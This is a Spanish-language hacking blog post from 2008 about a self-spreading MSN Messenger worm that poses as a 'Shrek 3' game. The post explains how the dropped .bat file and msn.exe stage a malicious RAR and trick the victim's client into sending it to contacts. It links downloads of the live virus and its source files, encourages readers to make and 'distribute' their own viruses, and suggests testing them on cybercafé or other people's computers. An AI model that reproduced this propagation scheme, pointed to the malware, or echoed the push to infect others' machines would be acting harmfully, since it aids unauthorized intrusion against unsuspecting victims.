[DARKNNES.BLOGSPOT.COM][HACKEAR MSN] - HACKEAR HOTMAIL, HACKEAR, MSN, XPLOITS GUSANITO Y OTRAS POSTALES, hack ...

martes, 23 de septiembre de 2008

SHREK 3 Virus para el MSN -Podes Hacer el tuyo-

http://www.krdesign.it/krdesign_lab/wp-content/uploads/2007/09/come_msn_eliminare_i_virus.jpg
Éste virus simula ser el juego de Shrek 3.

Lo ke hace es contaminar a los contactos del MSN de la víctima.

Consiste en un archivo llamado "Shrek 3 Msn Games 2007" ke al ejecutarse livera 3 archivos:

1-El archivo Shrek3_2007.rar (RAR ke contiene otro malware ke no viene al caso)
Se livera en la carpeta Windows y no se ejecuta.

2-El segundo archivo es el bat.bat.
Se livera en la carpeta Windows y se ejecuta.

3-El tercer archivo es el msn.exe.
Se livera en la carpeta Windows y se ejecuta.


bat.bat
: éste archivo crea la carpeta system en c: ke és la ke va a alojar el
archivo ke se autoenviará a los contactos del MSN. Y lo segundo ke hace
éste archivo es mover el archivo Shrek3_2007.rar a la carpeta ke acava
de crear, osea c:\\system.

msn.exe: éste archivo es el programa
ke realiza las emulaciones correspondientes para copiar al clipboard
(portapapeles) el archivo Shrek3_2007.rar contenido en c:\\system y
autoenviarlo a los contactos del msn.

Shrek3_2007.rar: RAR ke contiene un malware creado previamente. Precisamente este ->http://rapidshare.com/files/42025204..._2007.rar.html
En el momento ke ustedes hagan su propio virus para el MSN van a poder
hacer ke se autoenvie cualkier otra cosa, incluso una copia de si
mismo, pero esta vez es ése malware.


Funcionamiento:

La
victima ejecuta el archivo "Shrek 3 MSN Games 2007" e instantáneamente
se copian 3 archivos (los anteriormente descriptos) en la carpeta
c:\\windows.
Luego se crea la carpeta c:\\system y se mueve el archivo Shrek3_2007.rar a esa nueva carpeta.
Mientras sucede lo anterior, comiensa un timer de 5 segundos, luego de pasados 5 segundos aparece el siguiente cartel:

Pensemos ke ya pasaron 15 segundos, pasó más tiempo hasta ke se leyó el
mensaje anterior, osea ke ya le dimos tiempo a ke se cree correctamente
la carpeta c:\\system y se mueva el arhivo shrek3_2007 a ésa carpeta.

Luego
de apretar el boton "aceptar" del mensaje de error, comiensa una serie
de emulaciones ke permiten copiar al portapapeles (clipboard) el
archivo shrek3_2007.rar ke fué movido a la carpeta c:\\system
(recordemos ke estas 2 cosas son realizadas x el .bat).

Teniendo
ya el archivo en el portapapeles, la victima se volverá a comunicar con
algun contacto y en el momento en ke presione la tecla "s" va a enviar
involuntariamente el archivo shrek3_2007 a su contacto e
instantáneamente se va a minimizar todo permitiendo de esta manera ke
el contacto de la víctima acepte el archivo. De esta manera, y si todo
salió bien, el contacto de la víctima habrá resivido el archivo y lo
habrá ejecutado contaminándose.

Y pensemos ke la víctima tiene más de 1 contacto.


Acá
les dejo todo lo ke utilisé para realizar el virus. Desde el .s0m hasta
el .ico con la cara de shrek. Esto lo hago para ke puedan mejorarlo y
hacer sus propios virus para "distribuir" utilizando el msn.

Tambíen
dejo todo para ke analicen el .s0m y vean ke és lo ke hace para emular
el copiado del archivo en el portapapeles, etc etc etc...


UN CONSEJO

Antes
de ponerse a analizar y a crear sus propios virus para el MSN
utilizando esta data, envien el virus a algun contacto o alguien para
ke vean como funxiona, o hasta podrían probarlo ustedes mismos en algun
cybercafé o pc ke NO les pertenesca obviamente.

Bué, de todos modos si lo prueban en sus PC simplemente finalizan el msn.exe con el administrador y problema resuelto.


En ese post van a poder conocer las herramientas ke he utilizado para realizar éste virus.


Acá dejo el rar ke contiene el virus, obviamente si bajan el rar no pasa nada, todo sucede al ejecutar el archivo de Shrek.

DOWNOAD VIRUS ->http://rapidshare.com/files/44409961..._2007.rar.html

DOWNLOAD" archivos base"->http://rapidshare.com/files/44410070...zados.rar.html

Autor:Moskito



Agradecer no cuesta nada, Valora los aportes de los demas :P
y si te ha sido de utilidad comenta!!

No hay comentarios:

Publicar un comentario